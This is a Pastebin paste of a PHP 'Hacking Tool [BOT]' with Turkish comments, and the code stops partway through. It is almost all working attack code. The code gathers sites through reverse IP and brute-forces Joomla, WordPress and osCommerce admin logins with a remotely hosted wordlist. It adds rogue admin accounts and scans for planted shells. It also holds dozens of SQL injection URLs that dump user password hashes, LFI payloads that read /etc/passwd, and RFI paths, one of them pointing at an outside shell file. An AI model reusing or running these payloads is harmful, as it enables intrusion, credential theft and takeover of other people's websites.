sproductions

Hacking tool

Nov 2nd, 2011
1,101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.76 KB | None | 0 0
  1. <?php
  2. /*
  3. Hedef Site Hacking Tool[BOT] - Private Script
  4.  
  5. AppServ 2.6.0 bilgisayırınızda yüklü olmalıdır. ve
  6. register_globals = On
  7. register_long_arrays = On
  8. magic_quotes_gpc = On
  9.  
  10. IMPORTANT !!!!!!
  11.  
  12. If you want use this script on localhost :
  13.  
  14. AppServ 2.6.0 must be installed in your pc and
  15. register_globals = On
  16. register_long_arrays = On
  17. magic_quotes_gpc = On
  18.  
  19. Make this functions into Off in php.ini
  20.  
  21. IMPORTANT !!!!!!
  22.  
  23. [REVERSE-IP] in Public Version
  24. [FIND SCRIPTS] in Public Version
  25. [JOOMLA TOKEN SCAN] in Public Version
  26. [JOOMLA ADMIN PANEL BRUTE] in Private Version
  27. [JOOMLA SQL INJECTION] in Private Version
  28. [JOOMLA RFI SCAN] in Private Version
  29. [JOOMLA LFI SCAN] in Private Version
  30. [JOOMLA SHELL SCAN] in Private Version
  31. [WORDPRESS BRUTE FORCE] in Private Version
  32. [WORDPRESS SQL INJECTION] in Private Version
  33. [WORDPRESS RFI SCAN] in Private Version
  34. [OSCOMMERCE ADMIN ADD] in Private Version
  35. [VBULLETIN BRUTE FORCE] in Private Version
  36. [VBULLETIN DATA SQL SCAN] in Private Version
  37. [PAGERANK CHECKER] in Private Version
  38. [SQL INJECTION SCAN] in Private Version
  39. [FTP CRACKER] in Private Version
  40. [KNIGHT ONLINE CRACKER] in Private Version
  41. [METIN2 CRACKER] in Private Version
  42.  
  43. */
  44.  
  45. ob_start();
  46. set_time_limit(0);
  47.  
  48.  
  49. class H_Tool{
  50.  
  51. public $wordlist = "http://www.evdenevenakliyatlar.in/wordlist.txt";
  52. public $reverse = "http://networktools.nl/reverseip/";
  53. public $title = "#</b>:(.*?)</pre>#s";
  54. public $joom = array('components','option=com_');
  55. public $word = array('wp-content','wp-includes');
  56. public $osc = "Powered by osCommerce";
  57. public $vb = "Powered by vBulletin";
  58. public $token = "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si";
  59. public $url_1 = "/index.php?option=com_user&view=reset&layout=confirm";
  60. public $url_2 = "/index.php?option=com_user&task=confirmreset";
  61. public $url_3 = "/administrator/index.php";
  62. public $url_4 = "/wp-login.php";
  63. public $url_5 = "/admin/administrators.php/login.php?action=insert";
  64. public $url_6 = "/admin/login.php?action=process";
  65. public $url_7 = "/admincp/index.php";
  66. public $url_8 = "/login.php?do=login";
  67. public $url_9 = "/faq.php?s=&do=search&q=database&match=all&titlesonly=0";
  68. public $wpreg = "general.php";
  69. public $jomreg = "com_config";
  70. public $osreg = "configuration.php";
  71. public $yol_1 = "/templates/beez/index.php";
  72. public $yol_2 = "/templates/rhuk_milkyway/index.php";
  73. public $yol_3 = "/templates/system/index.php";
  74. public $shellkey = "safe_mod";
  75. public $sqlregex = "/:([0-9a-f]{32}):/";
  76. public $lfiregex = "root:x:";
  77. public $pgregex = '#<td align="center">(.*?)</td></tr>#s';
  78. public $vbregex = "/name=\"s\" value=\"([0-9a-f]{32})\"/si";
  79. public $vbreg = "logout";
  80. public $datareg = "Port:";
  81. public $hata = array('Sql syntax','mysql_fetch_array()','mysql_fetch_row()','mysql_num_rows()','Unclosed');
  82. public $sql = '/https?\:\/\/[^\" ]+/i';
  83. public $shell = "http://www.pirates-crew.org/ox/miya/red.txt?";
  84. public $sql_1 = "/index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*";
  85. public $sql_2 = "/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,password,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
  86. public $sql_3 = "/index.php?option=com_ttvideo&task=video&cid=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17%20FROM%20jos_users";
  87. public $sql_4 = "/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password&#41;,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users–";
  88. public $sql_5 = "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
  89. public $sql_6 = "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  90. public $sql_7 = "/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain";
  91. public $sql_8 = "/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*";
  92. public $sql_9 = "/?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201";
  93. public $sql_10 = "/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--";
  94. public $sql_11 = "/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--";
  95. public $sql_12 = "/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*";
  96. public $sql_13 = "/wp-admin/admin.php?page=people&action=printable&event_id=-12+union+select+0,1,2,user_pass+from+wp_users";
  97. public $lfi_1 = "/jeauto/index.php?option=com_jeauto&view=../../../../../../../../../../../../../../../etc/passwd%00";
  98. public $lfi_2 = "/index.php?option=com_jeauto&view=../../../../../../../../../../etc/passwd%00";
  99. public $lfi_3 = "/index.php?option=com_jradio&controller=../../../../../../../../../../etc/passwd%00";
  100. public $lfi_4 = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../etc/passwd%00&Itemid=4";
  101. public $lfi_5 = "/index.php?option=com_jotloader&section=../../../../../../../../../../etc/passwd%00";
  102. public $lfi_6 = "/index.php?option=com_picasa2gallery&controller=../../../../../../../../etc/passwd%00";
  103. public $lfi_7 = "/index.php?option=com_communitypolls&controller=../../../../../..etc/passwd%00";
  104. public $lfi_8 = "/index.php?option=com_news_portal&controller=../../../../../../../../../../../../etc/passwd%00";
  105. public $lfi_9 = "/index.php?option=com_ccnewsletter&controller=../../../../../../../etc/passwd%00";
  106. public $lfi_10 = "/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00";
  107. public $lfi_11 = "/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../etc/passwd%00";
  108. public $rfi_1 = "/components/com_simpleboard/file_upload.php?sbp=";
  109. public $rfi_2 = "/index.php?option=com_adsmanager&mosConfig_absolute_path=";
  110. public $rfi_3 = "/components/com_hashcash/server.php?mosConfig_absolute_path=";
  111. public $rfi_4 = "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
  112. public $rfi_5 = "/components/com_performs/performs.php?mosConfig_absolute_path=";
  113. public $rfi_6 = "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
  114. public $rfi_7 = "/components/com_smf/smf.php?mosConfig_absolute_path=";
  115. public $rfi_8 = "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
  116. public $rfi_9 = "/akocomments.php?mosConfig_absolute_path=";
  117. public $rfi_10 = "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
  118. public $rfi_11 = "/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=";
  119. public $rfi_12 = "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
  120. public $rfi_13 = "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
  121. public $rfi_14 = "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=";
  122. public $rfi_15 = "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=";
  123. public $rfi_16 = "/modules/mod_weather.php?absolute_path=";
  124. public $rfi_17 = "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=";
  125. public $rfi_18 = "/modules/mod_calendar.php?absolute_path=";
  126. public $rfi_19 = "/includes/Archive/Tar.php?mosConfig_absolute_path=";
  127. public $rfi_20 = "/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=";
  128. public $rfi_21 = "/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=";
  129. public $wprfi_1 = "/Enigma2.php?boarddir=";
  130. public $wprfi_2 = "/mygallery/myfunctions/mygallerybrowser.php?myPath=";
  131. public $wprfi_3 = "/plugins/wp-table/js/wptable-button.phpp?wpPATH=";
  132. public $wprfi_4 = "/plugins/wordtube/wordtube-button.php?wpPATH=";
  133. public $wprfi_5 = "/plugins/myflash/myflash-button.php?wpPATH=";
  134. public $wprfi_6 = "/plugins/BackUp/Archive.php?bkpwp_plugin_path=";
  135. public $wprfi_7 = "/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=";
  136. public $wprfi_8 = "/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=";
  137. public $wprfi_9 = "/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=";
  138. public $wprfi_10 = "/plugins/sniplets/modules/syntax_highlight.php?libpath=";
  139.  
  140.  
  141. public function ana(){
  142.  
  143. echo "\n#######################################\nHedef Hacking Tool Private Script #\n";
  144. echo "Coded by MiyaChung #\n";
  145. echo "Usage : php tool.php komutlar #\n";
  146. echo "[email protected] #\n";
  147. echo "www.mavi1.org #\nSpecial Thanks : xzadx #\n#######################################\n";
  148.  
  149. }
  150. public function komutlar(){
  151.  
  152. echo "\nKomutlar\n\n 1.php tool.php www.site.com = (Reverse IP)\n";
  153. echo " 2.php bot.php ayir = (Ayirma Joomla-wordpress vs.)\n";
  154. echo " 3.php bot.php jomtoken = (Joomla token tara)\n";
  155. echo " 4.php bot.php jombrute = (Joomla brute)\n";
  156. echo " 5.php bot.php jomsql = (Joomla SQL Injection ara)\n";
  157. echo " 6.php bot.php jomlfi = (Joomla LFI ara)\n";
  158. echo " 7.php bot.php jomrfi = (Joomla RFI ara)\n";
  159. echo " 8.php bot.php shellara = (Joomla shell ara)\n";
  160. echo " 9.php bot.php wpbrute = (Wordpress brute)\n";
  161. echo " 10.php bot.php wpsql = (Wordpress SQL Injection ara)\n";
  162. echo " 11.php bot.php wprfi = (Wordpress RFI Ara)\n";
  163. echo " 12.php bot.php osreset = (osCommerce admin reset)\n";
  164. echo " 13.php bot.php vbrute = (vBulletin Brute Force)\n";
  165. echo " 14.php bot.php datasql = (vBulletin Data SQL ara)\n";
  166. echo " 15.php bot.php pagerank = (Pagerank Checker)\n";
  167. echo " 16.php bot.php sqlinj = (SQL Injection ara)\n";
  168. echo " 17.php bot.php ftpbrute = (FTP Cracker)\n";
  169. echo " 18.php bot.php kobrute = (Knight Online Cracker)\n";
  170. echo " 19.php bot.php metinbrute = (Metin2 Cracker)\n";
  171.  
  172. }
  173. public function kaydet($dosya,$icerik){
  174.  
  175. $fopen = fopen($dosya,'ab');
  176. fwrite($fopen,$icerik."\r\n");
  177. fclose($fopen);
  178.  
  179.  
  180. }
  181.  
  182.  
  183. public function reverse($site){
  184.  
  185. $soket=curl_init();
  186. curl_setopt($soket,CURLOPT_URL,$this->reverse.$site);
  187. curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
  188. curl_exec($soket);
  189. $exec=curl_exec($soket);
  190. curl_close($soket);
  191.  
  192. preg_match_all($this->title,$exec,$yaz);
  193. foreach($yaz[0] as $yazdir){
  194. $yazdir=ereg_replace("</b>:","",$yazdir);
  195. $yazdir=ereg_replace("</pre>","",$yazdir);
  196. $yazdir=explode("\n",$yazdir);
  197. foreach($yazdir as $liste){
  198. $liste=trim($liste);
  199.  
  200. $kaydet = self::kaydet("reverse.txt",$liste);
  201. }
  202. $say = explode("\n",file_get_contents("reverse.txt"));
  203. $say = count($say);
  204.  
  205. echo "Toplam ".$say." Site var . Siteler reverse.txt olarak kaydedildi.";
  206.  
  207. }
  208.  
  209. }
  210. public function ayir(){
  211.  
  212.  
  213. $siteler = explode("\n",file_get_contents('reverse.txt'));
  214.  
  215. foreach($siteler as $tumsite){
  216.  
  217. $tumsite=trim($tumsite);
  218.  
  219. $curl=curl_init();
  220. curl_setopt($curl,CURLOPT_URL,$tumsite);
  221. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  222. curl_setopt($curl,CURLOPT_TIMEOUT,15);
  223. $calistir = curl_exec($curl);
  224.  
  225. if(eregi($this->joom[0],$calistir)){
  226.  
  227. echo $tumsite." -> Joomla bulundu joomla.txt\n";
  228.  
  229. ob_flush();
  230. flush();
  231.  
  232. $kayit_1 = self::kaydet("joomla.txt",$tumsite);
  233.  
  234. }elseif(eregi($this->joom[1],$calistir)){
  235. echo $tumsite." -> Joomla bulundu joomla.txt\n";
  236.  
  237. ob_flush();
  238. flush();
  239. $kayit_2 = self::kaydet("joomla.txt",$tumsite);
  240. }elseif(eregi($this->word[0],$calistir)){
  241. echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
  242.  
  243. ob_flush();
  244. flush();
  245.  
  246. $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
  247. }elseif(eregi($this->word[1],$calistir)){
  248. echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
  249.  
  250. ob_flush();
  251. flush();
  252.  
  253. $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
  254. }elseif(eregi($this->osc,$calistir)){
  255. echo $tumsite." -> osCommerce bulundu oscommerce.txt\n";
  256.  
  257. ob_flush();
  258. flush();
  259.  
  260. $kayit_3 = self::kaydet("oscommerce.txt",$tumsite);
  261. }elseif(eregi($this->vb,$calistir)){
  262.  
  263. echo $tumsite." -> vBulletin bulundu vbulletin.txt\n";
  264. ob_flush();
  265. flush();
  266.  
  267. $kayit_4 = self::kaydet("vbulletin.txt",$tumsite);
  268. }
  269.  
  270.  
  271. }
  272. echo "\nArama bitti.\n";
  273.  
  274. }
  275. public function token_1($site){
  276.  
  277. $curl=curl_init();
  278. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  279. curl_setopt($curl, CURLOPT_URL,$site);
  280. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  281. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
  282. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
  283. curl_setopt($curl, CURLOPT_TIMEOUT,35);
  284. $exec=curl_exec($curl);
  285. curl_close($curl);
  286. return $exec;
  287.  
  288.  
  289.  
  290.  
  291. }
  292. public function token_2(){
  293.  
  294.  
  295.  
  296. $explode = explode("\n",file_get_contents("joomla.txt"));
  297. foreach($explode as $sitelist){
  298. $sitelist=trim($sitelist);
  299. $url_1 = $sitelist.$this->url_1;
  300. $hash = self::hashAl($url_1);
  301. $url_2 = $sitelist.$this->url_2;
  302.  
  303. $curl=curl_init();
  304. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  305. curl_setopt($curl, CURLOPT_URL,$url_2);
  306. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  307. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
  308. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
  309. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  310. curl_setopt($curl, CURLOPT_POST, 1);
  311. curl_setopt($curl, CURLOPT_POSTFIELDS, "token=%27&".$hash."=1");
  312. curl_setopt($curl, CURLOPT_TIMEOUT,35);
  313. $exec = curl_exec($curl);
  314. curl_close($curl);
  315. if(eregi('name="password1"',$exec)){
  316.  
  317. echo $sitelist." -> Joomla Token Bulundu token.txt\n";
  318.  
  319. ob_flush();
  320. flush();
  321. $kaydet=self::kaydet("token.txt",$sitelist.$this->url_1);
  322. }
  323.  
  324.  
  325. }
  326. @unlink("cookie.txt");
  327. echo "\nTarama Bitti sonuclar token.txt\n";
  328.  
  329. }
  330.  
  331. public function hashAl($site){
  332.  
  333. $url=self::token_1($site);
  334. preg_match_all($this->token,$url,$hash);
  335. return $hash[1][0];
  336.  
  337. }
  338. public function jombrute_1($url){
  339.  
  340.  
  341. $curl=curl_init();
  342. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  343. curl_setopt($curl, CURLOPT_URL,$url);
  344. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  345. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
  346. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
  347. curl_setopt($curl, CURLOPT_TIMEOUT,35);
  348. $exec=curl_exec($curl);
  349. curl_close($curl);
  350. return $exec;
  351.  
  352.  
  353. }
  354. public function jombrute_2(){
  355. $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
  356. foreach($exp as $passwords){
  357. $passwords=trim($passwords);
  358. $explode = explode("\n",file_get_contents("joomla.txt"));
  359. foreach($explode as $sitelist){
  360. $sitelist=trim($sitelist);
  361. $url_1 = $sitelist.$this->url_3;
  362. $hash = self::hash_Al($url_1);
  363. $url_2 = $sitelist.$this->url_3;
  364.  
  365. $curl=curl_init();
  366. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  367. curl_setopt($curl, CURLOPT_URL,$url_2);
  368. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  369. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
  370. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
  371. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  372. curl_setopt($curl, CURLOPT_POST, 1);
  373. curl_setopt($curl, CURLOPT_POSTFIELDS, 'username=admin&passwd='.$passwords.'&lang=&option=com_login&task=login&'.$hash.'=1');
  374. curl_setopt($curl, CURLOPT_TIMEOUT,35);
  375. $exec = curl_exec($curl);
  376. curl_close($curl);
  377. if(eregi($this->jomreg,$exec)){
  378.  
  379. echo $sitelist." -> admin:".$passwords." Panel girisi bulundu jombrute.txt\n";
  380. ob_flush();
  381. flush();
  382. $kaydet=self::kaydet("jombrute.txt",$sitelist.$this->url_3." Password : ".$passwords."");
  383. }
  384.  
  385. }
  386. }
  387. @unlink("cook.txt");
  388. echo "\nJoomla brute force bitti jombrute.txt";
  389. }
  390.  
  391. public function hash_Al($site){
  392. $url=self::jombrute_1($site);
  393. preg_match_all($this->token,$url,$hash);
  394. return $hash[1][0];
  395.  
  396.  
  397.  
  398. }
  399. public function wpbrute(){
  400. $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
  401. foreach($exp as $passwords){
  402. $passwords=trim($passwords);
  403. $explode = explode("\n",file_get_contents("wordpress.txt"));
  404. foreach($explode as $sites){
  405. $sifreler=trim($sifreler);
  406. $sites=trim($sites);
  407.  
  408. $curl = curl_init();
  409. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  410. curl_setopt($curl,CURLOPT_URL,$sites.$this->url_4);
  411. curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.dat");
  412. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  413. curl_setopt($curl,CURLOPT_POST,1);
  414. curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$passwords."&redirect_to=".$sites."/wp-admin/&testcookie=1");
  415. curl_setopt($curl,CURLOPT_TIMEOUT,25);
  416. $calis = curl_exec($curl);
  417. if(eregi($this->wpreg,$calis)){
  418.  
  419. echo $sites." -> admin:".$passwords." Wordpress girisi bulundu wpbrute.txt\n";
  420. ob_flush();
  421. flush();
  422.  
  423. $kaydet=self::kaydet('wpbrute.txt',$sites.$this->url_4." Password : ".$passwords."");
  424.  
  425. }
  426.  
  427.  
  428.  
  429. }
  430. }
  431. @unlink("cookie.dat");
  432. echo "\nWordpress Brute Force bitti";
  433. }
  434.  
  435. public function osc_reset($sites){
  436. $curl=curl_init();
  437. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  438. curl_setopt($curl,CURLOPT_URL,$sites.$this->url_5);
  439. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  440. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
  441. curl_setopt($curl,CURLOPT_POST,1);
  442. curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345&x=0&y=0');
  443. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  444. $run=curl_exec($curl);
  445. curl_close($curl);
  446. return $run;
  447.  
  448. }
  449. public function osc_login(){
  450. $explode = explode("\n",file_get_contents("oscommerce.txt"));
  451. foreach($explode as $siteler){
  452. $siteler=trim($siteler);
  453.  
  454. $reset=self::osc_reset($siteler);
  455.  
  456. $curl=curl_init();
  457. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  458. curl_setopt($curl,CURLOPT_URL,$siteler.$this->url_6);
  459. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
  460. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  461. curl_setopt($curl,CURLOPT_COOKIEFILE,'os.txt');
  462. curl_setopt($curl,CURLOPT_COOKIEJAR,'os.txt');
  463. curl_setopt($curl,CURLOPT_POST,1);
  464. curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345');
  465. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  466. $run=curl_exec($curl);
  467. curl_close($curl);
  468. if(eregi($this->osreg,$run)){
  469.  
  470. echo $siteler." -> osCommerce admin eklendi osreset.txt\n";
  471. ob_flush();
  472. flush();
  473.  
  474. $kaydet=self::kaydet("osreset.txt",$siteler."/admin/login.php");
  475.  
  476. }
  477.  
  478.  
  479. }
  480. @unlink("os.txt");
  481. echo "\nOscommerce admin reset deneme bitti\n";
  482. }
  483. public function shellara(){
  484.  
  485. $explode = explode("\n",file_get_contents("reverse.txt"));
  486. foreach($explode as $sites){
  487.  
  488. $sites=trim($sites);
  489.  
  490. $url_1 = self::curl($sites.$this->yol_1);
  491. $url_2 = self::curl($sites.$this->yol_2);
  492. $url_3 = self::curl($sites.$this->yol_3);
  493. if(eregi($this->shellkey,$url_1)){
  494. echo $sites.$this->yol_1." -> Shell Bulundu shell.txt\n";
  495.  
  496. ob_flush();
  497. flush();
  498. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_1);
  499. }
  500. if(eregi($this->shellkey,$url_2)){
  501. echo $sites.$this->yol_2." -> Shell Bulundu shell.txt\n";
  502.  
  503. ob_flush();
  504. flush();
  505. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_2);
  506. }
  507. if(eregi($this->shellkey,$url_3)){
  508. echo $sites.$this->yol_3." -> Shell Bulundu shell.txt\n";
  509.  
  510. ob_flush();
  511. flush();
  512. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_3);
  513. }
  514.  
  515.  
  516.  
  517.  
  518.  
  519.  
  520. }
  521.  
  522. echo "\nShell Arama bitti.";
  523.  
  524. }
  525. public function curl($site){
  526. $curl=curl_init();
  527. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  528. curl_setopt($curl,CURLOPT_URL,$site);
  529.  
  530. $exec=curl_exec($curl);
  531. curl_close($curl);
  532. return $exec;
  533. }
  534.  
  535. public function jomsql(){
  536.  
  537. $explode = explode("\n",file_get_contents("joomla.txt"));
  538. foreach($explode as $sites){
  539.  
  540. $sites=trim($sites);
  541. $bak_1 = self::curl($sites.$this->sql_1);
  542. $bak_2 = self::curl($sites.$this->sql_2);
  543. $bak_3 = self::curl($sites.$this->sql_3);
  544. $bak_4 = self::curl($sites.$this->sql_4);
  545. $bak_5 = self::curl($sites.$this->sql_5);
  546. $bak_6 = self::curl($sites.$this->sql_6);
  547.  
  548. if(preg_match($this->sqlregex,$bak_1)){
  549.  
  550. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  551.  
  552. ob_flush();
  553. flush();
  554.  
  555. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_1);
  556.  
  557. }
  558. if(preg_match($this->sqlregex,$bak_2)){
  559.  
  560. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  561.  
  562. ob_flush();
  563. flush();
  564.  
  565. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_2);
  566.  
  567. }
  568. if(preg_match($this->sqlregex,$bak_3)){
  569.  
  570. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  571.  
  572. ob_flush();
  573. flush();
  574.  
  575. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_3);
  576.  
  577. }
  578. if(preg_match($this->sqlregex,$bak_4)){
  579.  
  580. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  581.  
  582. ob_flush();
  583. flush();
  584.  
  585. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_4);
  586.  
  587. }
  588. if(preg_match($this->sqlregex,$bak_5)){
  589.  
  590. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  591.  
  592. ob_flush();
  593. flush();
  594.  
  595. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_5);
  596.  
  597. }
  598. if(preg_match($this->sqlregex,$bak_6)){
  599.  
  600. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
  601.  
  602. ob_flush();
  603. flush();
  604.  
  605. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_6);
  606.  
  607. }
  608.  
  609.  
  610.  
  611.  
  612. }
  613.  
  614. echo "\nJoomla SQL Aramasi bitti.";
  615.  
  616.  
  617.  
  618. }
  619.  
  620. public function wpsql(){
  621.  
  622. $explode = explode("\n",file_get_contents("wordpress.txt"));
  623.  
  624. foreach($explode as $sites){
  625. $sites=trim($sites);
  626. $bak_1 = self::curl($sites.$this->sql_7);
  627. $bak_2 = self::curl($sites.$this->sql_8);
  628. $bak_3 = self::curl($sites.$this->sql_9);
  629. $bak_4 = self::curl($sites.$this->sql_10);
  630. $bak_5 = self::curl($sites.$this->sql_11);
  631. $bak_6 = self::curl($sites.$this->sql_12);
  632. $bak_7 = self::curl($sites.$this->sql_13);
  633.  
  634.  
  635. if(preg_match($this->sqlregex,$bak_1)){
  636.  
  637. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  638. ob_flush();
  639. flush();
  640.  
  641. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_7);
  642.  
  643. }
  644. if(preg_match($this->sqlregex,$bak_2)){
  645.  
  646. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  647. ob_flush();
  648. flush();
  649.  
  650. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_8);
  651.  
  652. }
  653. if(preg_match($this->sqlregex,$bak_3)){
  654.  
  655. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  656. ob_flush();
  657. flush();
  658.  
  659. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_9);
  660.  
  661. }
  662. if(preg_match($this->sqlregex,$bak_4)){
  663.  
  664. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  665. ob_flush();
  666. flush();
  667.  
  668. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_10);
  669.  
  670. }
  671. if(preg_match($this->sqlregex,$bak_5)){
  672.  
  673. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  674. ob_flush();
  675. flush();
  676.  
  677. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_11);
  678.  
  679. }
  680. if(preg_match($this->sqlregex,$bak_6)){
  681.  
  682. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  683. ob_flush();
  684. flush();
  685.  
  686. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_12);
  687.  
  688. }
  689. if(preg_match($this->sqlregex,$bak_7)){
  690.  
  691. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
  692. ob_flush();
  693. flush();
  694.  
  695. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_13);
  696.  
  697. }
  698.  
  699. }
  700.  
  701. echo "\nWordpress SQL Aramasi bitti";
  702.  
  703.  
  704. }
  705. public function jomlfi(){
  706. $explode = explode("\n",file_get_contents("joomla.txt"));
  707.  
